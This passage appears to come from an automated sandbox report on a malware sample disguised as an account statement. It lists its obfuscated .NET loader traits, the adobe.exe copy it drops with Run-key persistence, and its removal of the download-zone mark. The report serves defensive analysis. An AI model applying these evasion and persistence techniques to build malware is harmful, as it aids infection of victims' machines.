                    Source: Statement of Account - USD 16,720.00.exe, RandomClothingAttributesf.cs.Net Code: Polan System.AppDomain.Load(byte[])
                    Source: adobe.exe.1.dr, RandomClothingAttributesf.cs.Net Code: Polan System.AppDomain.Load(byte[])
                    Source: Statement of Account - USD 16,720.00.exeStatic PE information: 0x9FFD5834 [Thu Jan 21 21:42:12 2055 UTC]
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_00F00600 push edx; retf 0000h1_2_00F0061A
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_00F00C55 push edi; retf 1_2_00F00C7A
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_06752345 push edi; ret 1_2_06752346
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_067BFBD1 push eax; ret 1_2_067BFBDD
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_01250C55 push edi; retf 6_2_01250C7A
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_0125EED0 pushad ; ret 6_2_0125EED1
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06B2866D push esp; iretd 6_2_06B28675
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06B28068 push esp; iretd 6_2_06B28071
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06B2767F push es; ret 6_2_06B27680
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06B2B7A0 push es; ret 6_2_06B2B7B0
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_04F70CF8 push 2804E9CFh; iretd 8_2_04F70CFD
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_00E0EED0 pushad ; ret 9_2_00E0EED1
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_0684866D push esp; iretd 9_2_06848675
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_06848068 push esp; iretd 9_2_06848071
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_0684B7A0 push es; ret 9_2_0684B7B0
                    Source: Statement of Account - USD 16,720.00.exeStatic PE information: section name: .text entropy: 7.494181501767098
                    Source: adobe.exe.1.drStatic PE information: section name: .text entropy: 7.494181501767098
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.5c50000.3.raw.unpack, Form1.csHigh entropy of concatenated method names: 'oxycobaltammine', 'fringier', 'unchorded', 'wAhRr7CKv', 'Dispose', 'lVOGV1721', 'ULHqFVpPeqZbNsBNpV', 'TchE2TMnA4CKf52ZUf', 'f0mq9hQrUpsqOwSyGd', 'nTd0Zl0tx6BYOWEqZW'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.5c50000.3.raw.unpack, QJDLGErGwGLnDsDTGnUfx.csHigh entropy of concatenated method names: 'pwiMsJJwOLAUrsrsiLrJk', 'vkJkyBAyMrJJZpZnJUUsB', 'pBDTEixOwwhDhOiywipLh', 'wZnEyxixGJZZTGvwQsrMDAvGiTwBJLT', 'erhT', 'aerhTteS46w', 'LvfQyBLvviAnvZJBUkfipTGCDTvQDxU', 'F6WFViyxW', 'TE3wDwuNS', 'MyGetProcAddressWrapper'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, Form1.csHigh entropy of concatenated method names: 'oxycobaltammine', 'fringier', 'unchorded', 'wAhRr7CKv', 'Dispose', 'lVOGV1721', 'ULHqFVpPeqZbNsBNpV', 'TchE2TMnA4CKf52ZUf', 'f0mq9hQrUpsqOwSyGd', 'nTd0Zl0tx6BYOWEqZW'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, QJDLGErGwGLnDsDTGnUfx.csHigh entropy of concatenated method names: 'pwiMsJJwOLAUrsrsiLrJk', 'vkJkyBAyMrJJZpZnJUUsB', 'pBDTEixOwwhDhOiywipLh', 'wZnEyxixGJZZTGvwQsrMDAvGiTwBJLT', 'erhT', 'aerhTteS46w', 'LvfQyBLvviAnvZJBUkfipTGCDTvQDxU', 'F6WFViyxW', 'TE3wDwuNS', 'MyGetProcAddressWrapper'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, Form1.csHigh entropy of concatenated method names: 'oxycobaltammine', 'fringier', 'unchorded', 'wAhRr7CKv', 'Dispose', 'lVOGV1721', 'ULHqFVpPeqZbNsBNpV', 'TchE2TMnA4CKf52ZUf', 'f0mq9hQrUpsqOwSyGd', 'nTd0Zl0tx6BYOWEqZW'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, QJDLGErGwGLnDsDTGnUfx.csHigh entropy of concatenated method names: 'pwiMsJJwOLAUrsrsiLrJk', 'vkJkyBAyMrJJZpZnJUUsB', 'pBDTEixOwwhDhOiywipLh', 'wZnEyxixGJZZTGvwQsrMDAvGiTwBJLT', 'erhT', 'aerhTteS46w', 'LvfQyBLvviAnvZJBUkfipTGCDTvQDxU', 'F6WFViyxW', 'TE3wDwuNS', 'MyGetProcAddressWrapper'

                    Persistence and Installation Behavior

                    barindex
                    Drops executable to a common third party application directory
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeFile written: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeFile created: \statement of account - usd 16,720.00.exe
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeFile created: \statement of account - usd 16,720.00.exeJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeFile created: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeFile opened: C:\Users\user\AppData\Roaming\adobe\adobe.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
